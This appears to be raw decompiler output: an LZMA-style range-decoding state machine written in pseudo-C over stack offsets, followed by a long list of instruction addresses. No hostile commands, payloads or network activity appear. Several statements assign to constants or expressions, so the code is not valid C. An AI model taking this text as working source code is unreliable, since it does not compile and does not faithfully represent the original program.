											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406d0f
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d15
0x00406d19
0x00406d1d
0x00406d27
0x00406d35
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00407042
0x00407042
0x00407046
0x00000000
0x00000000
0x00407048
0x00407051
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407069
0x00407082
0x00407085
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x0040707a
0x0040707d
0x0040707d
0x0040709f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407046
0x00000000
0x00000000
0x00000000
0x004070a1
0x004070a1
0x0040701a
0x0040701e
0x00407156
0x00407156
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x00407024
0x0040702a
0x00407031
0x00407039
0x00407039
0x0040703c
0x00000000
0x0040703c
0x004070a6
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x0040676d
0x00000000
0x00406774
0x00406778
0x00000000
0x00000000
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067d9
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x004070c9
0x00000000
0x004070c9
0x00406823
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x0040684d
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x004070d8
0x00000000
0x004070d8
0x00406893
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x0040714a
0x00000000
0x0040714a
0x00406fa1
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x00000000
0x00000000
0x004068da
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00000000
0x00406967
0x004068e1
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00406c26
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
